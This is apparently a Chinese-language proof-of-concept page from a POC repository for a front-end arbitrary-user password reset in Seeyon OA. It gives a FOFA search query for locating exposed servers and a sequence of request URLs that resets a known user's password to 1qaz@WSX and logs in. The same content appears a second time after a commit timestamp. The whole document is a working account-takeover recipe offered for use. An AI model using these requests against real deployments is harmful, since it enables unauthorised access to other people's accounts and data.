POC/wpoc/致远OA/致远前台任意用户密码修改.md

## 致远前台任意用户密码修改

## fofa
```
app="致远互联-OA"
```

## 漏洞复现
前提需要知道用户名

`http://xx.xx.xx.xx/seeyon/personalBind.do?method=retrievePassword`

<img width="1057" alt="image-20240301101704702" src="https://github.com/wy876/POC/assets/139549762/9562a165-151e-421c-a26c-7e09bf199368">

`http://xx.xx.xx.xx/seeyon/personalBind.do?method=sendVerificationCodeToBindNum&type=validate&origin=zx`

<img width="1047" alt="image-20240301101722837" src="https://github.com/wy876/POC/assets/139549762/c1ea9e86-1a92-4aaa-945d-a1a45c83509e">

修改密码为`1qaz@WSX`

`http://xx.xx.xx.xx/seeyon/individualManager.do?method=resetPassword&nowpwd=1qaz@WSX`

<img width="1217" alt="image-20240301101802224" src="https://github.com/wy876/POC/assets/139549762/5375cccc-0a9b-4ae0-8e3e-177aa67290b1">

最后使用修改的密码登录

<img width="1054" alt="image-20240301101840756" src="https://github.com/wy876/POC/assets/139549762/261afdc9-a728-4302-96a6-e0e19d02d338">
first commit 2025-03-04 23:12:57 +08:00			`## 致远前台任意用户密码修改`

			`## fofa`
			```
			`app="致远互联-OA"`
			```

			`## 漏洞复现`
			`前提需要知道用户名`

			`http://xx.xx.xx.xx/seeyon/personalBind.do?method=retrievePassword`

			`<img width="1057" alt="image-20240301101704702" src="https://github.com/wy876/POC/assets/139549762/9562a165-151e-421c-a26c-7e09bf199368">`

			`http://xx.xx.xx.xx/seeyon/personalBind.do?method=sendVerificationCodeToBindNum&type=validate&origin=zx`

			`<img width="1047" alt="image-20240301101722837" src="https://github.com/wy876/POC/assets/139549762/c1ea9e86-1a92-4aaa-945d-a1a45c83509e">`

			修改密码为`1qaz@WSX`

			`http://xx.xx.xx.xx/seeyon/individualManager.do?method=resetPassword&nowpwd=1qaz@WSX`

			`<img width="1217" alt="image-20240301101802224" src="https://github.com/wy876/POC/assets/139549762/5375cccc-0a9b-4ae0-8e3e-177aa67290b1">`

			`最后使用修改的密码登录`

			`<img width="1054" alt="image-20240301101840756" src="https://github.com/wy876/POC/assets/139549762/261afdc9-a728-4302-96a6-e0e19d02d338">`